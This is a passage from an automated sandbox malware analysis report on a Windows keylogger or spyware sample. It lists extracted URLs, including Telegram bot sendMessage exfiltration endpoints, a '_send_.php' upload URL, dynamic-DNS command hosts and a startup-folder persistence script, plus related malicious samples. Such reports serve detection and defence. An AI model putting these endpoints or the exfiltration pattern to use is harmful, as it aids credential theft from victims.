                                            https://stackoverflow.com/q/14436606/23354pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1331701274.0000000002971000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1463433201.0000000002A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.orgInstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/mgravell/protobuf-netJpbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.telegram.org/botpbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://mail.iaa-airferight.comInstallUtil.exe, 00000001.00000002.2570925272.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.office.com/lBInstallUtil.exe, 00000001.00000002.2570925272.0000000002CB0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000254C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://github.com/mgravell/protobuf-netpbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ac.ecosia.org?q=InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://checkip.dyndns.orgInstallUtil.exe, 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002590000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=InstallUtil.exe, 00000001.00000002.2575465092.0000000003C4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://chrome.google.com/webstore?hl=en4InstallUtil.exe, 00000001.00000002.2570925272.0000000002C84000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002520000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://chrome.google.com/webstore?hl=enInstallUtil.exe, 00000004.00000002.2569306283.0000000002511000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://varders.kozow.com:8081pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20aInstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://aborters.duckdns.org:8081pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.google.com/images/branding/product/ico/googleg_alldp.icoInstallUtil.exe, 00000001.00000002.2575465092.0000000003C4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.ecosia.org/newtab/v20InstallUtil.exe, 00000001.00000002.2575465092.0000000003C4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://github.com/mgravell/protobuf-netipbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.office.com/4InstallUtil.exe, 00000001.00000002.2570925272.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002551000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://51.38.247.67:8081/_send_.php?LInstallUtil.exe, 00000001.00000002.2570925272.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://anotherarmy.dns.army:8081pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://stackoverflow.com/q/11564914/23354;pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://stackoverflow.com/q/2152978/23354pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchInstallUtil.exe, 00000001.00000002.2575465092.0000000003C4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://checkip.dyndns.org/qpbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://chrome.google.com/webstore?hl=enlBInstallUtil.exe, 00000001.00000002.2570925272.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000251B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://reallyfreegeoip.org/xml/8.46.123.189$InstallUtil.exe, 00000001.00000002.2570925272.0000000002BE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002590000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000243A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000247F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://reallyfreegeoip.orgInstallUtil.exe, 00000001.00000002.2570925272.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://duckduckgo.com/chrome_newtabv209hInstallUtil.exe, 00000001.00000002.2575465092.0000000003C4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://api.telegramInstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://reallyfreegeoip.orgInstallUtil.exe, 00000001.00000002.2570925272.0000000002BE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B73000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000247F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002410000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://checkip.dyndns.comInstallUtil.exe, 00000001.00000002.2570925272.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://api.telegram.orgInstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepbgjw8i8N7.exe, 00000000.00000002.1331701274.0000000002971000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1463433201.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://gemini.google.com/app?q=InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedpbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://reallyfreegeoip.org/xml/pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B73000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002410000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high

                                                                                                                            World Map of Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public IPs

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            149.154.167.220
                                                                                                                            		api.telegram.orgUnited Kingdom
                                                                                                                            		62041TELEGRAMRUfalse
                                                                                                                            46.175.148.58
                                                                                                                            		mail.iaa-airferight.comUkraine
                                                                                                                            		56394ASLAGIDKOM-NETUAfalse
                                                                                                                            104.21.96.1
                                                                                                                            		reallyfreegeoip.orgUnited States
                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                            158.101.44.242
                                                                                                                            		checkip.dyndns.comUnited States
                                                                                                                            		31898ORACLE-BMC-31898USfalse

                                                                                                                            General Information

                                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                                            Analysis ID:1634876
                                                                                                                            Start date and time:2025-03-11 06:09:02 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 9m 0s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:14
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:pbgjw8i8N7.exe
                                                                                                                            renamed because original name is a hash value
                                                                                                                            Original Sample Name:44095f79a9e682a29ed75fab33f6dcf1e2f11937097e4c7e3f84080ff7444048.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@4/4
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 96%
                                                                                                                            • Number of executed functions: 443
                                                                                                                            • Number of non-executed functions: 47
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                            Warnings

                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 23.199.214.10, 52.149.20.212, 150.171.27.10
                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, g.bing.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            TimeTypeDescription
                                                                                                                            01:10:03API Interceptor2376135x Sleep call for process: InstallUtil.exe modified
                                                                                                                            06:09:59AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            149.154.167.220fw5476UX6g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                              C7fclY8IiM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                oybsEA5EhR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  TpHHp3vAuM.exeGet hashmaliciousCryptOne, Snake KeyloggerBrowse
                                                                                                                                    faz3VkyT7b.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                      bddTkmucZP.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                        ctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          bc7hwStvUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            NifDAK5eSH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                              gID5oMWjq1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                46.175.148.58G3uJOLisBq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  yxoY9FvULu.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                    ShGhJDcXXI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      wpo28029 Changzhou Tairun.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        gcXBQbWQ1p.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                          AmEZrFh7we.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            3SgC5vaFEg.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                              SecuriteInfo.com.Win32.CrypterX-gen.27605.29739.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                PO 352995.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  Ningbo Overdue Invoice - JAN 23,2025.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    104.21.96.1hh01FRs81x.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • www.newanthoperso.shop/3nis/?LL=4FHLH&R4lxS2-P=7Jez/f8BRsPhvFRcTYEfxOkzfWBvvrnmo+4qP8uldvbHjjygNPFvdo5E4tKnf+Ij1qWwstrtA/xMUYgdGo9Dw7YPXWw4NGSG4oy32mHU2IUoylmJFg==
                                                                                                                                                                    yloe82Jp1k.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • www.sigaque.today/n61y/
                                                                                                                                                                    A2h6QhZIKx.exeGet hashmaliciousAzorultBrowse
                                                                                                                                                                    • k1d5.icu/TP341/index.php
                                                                                                                                                                    DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • www.rbopisalive.cyou/2dxw/
                                                                                                                                                                    r_BBVA_MensajeSWIFT04-03-2025-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • www.kdrqcyusevx.info/k7wl/
                                                                                                                                                                    MUH030425.exeGet hashmaliciousAzorultBrowse
                                                                                                                                                                    • k1d5.icu/TP341/index.php
                                                                                                                                                                    Invoice Remittance ref20250226.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • www.rbopisalive.cyou/a669/
                                                                                                                                                                    368c6e62-b031-5b65-fd43-e7a610184138.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • ce60771026585.oakdiiocese.org/r/74?session=770558a25b5d1fcbb8d81f113631d430f5b8d022cdc6d97cf6b16a412a3be9e6
                                                                                                                                                                    PO.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                    • touxzw.ir/sccc/five/fre.php
                                                                                                                                                                    OEoRzjI7JgSiUUd.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                    • touxzw.ir/sss2/five/fre.php

                                                                                                                                                                    Domains

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    reallyfreegeoip.orghcy2SdW2z6.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                    fw5476UX6g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 104.21.64.1
                                                                                                                                                                    C7fclY8IiM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 104.21.112.1
                                                                                                                                                                    oybsEA5EhR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 104.21.48.1
                                                                                                                                                                    TpHHp3vAuM.exeGet hashmaliciousCryptOne, Snake KeyloggerBrowse
                                                                                                                                                                    • 104.21.32.1
                                                                                                                                                                    faz3VkyT7b.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                    • 104.21.64.1
                                                                                                                                                                    REQ. NO.237.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                    bddTkmucZP.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 104.21.80.1
                                                                                                                                                                    ctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 104.21.64.1
                                                                                                                                                                    ZX0sNnKlqT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                    • 104.21.80.1
                                                                                                                                                                    mail.iaa-airferight.comG3uJOLisBq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    yxoY9FvULu.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    ShGhJDcXXI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    wpo28029 Changzhou Tairun.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    gcXBQbWQ1p.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    AmEZrFh7we.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    3SgC5vaFEg.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    SecuriteInfo.com.Win32.CrypterX-gen.27605.29739.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    PO 352995.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    Ningbo Overdue Invoice - JAN 23,2025.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    api.telegram.orgfw5476UX6g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    C7fclY8IiM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
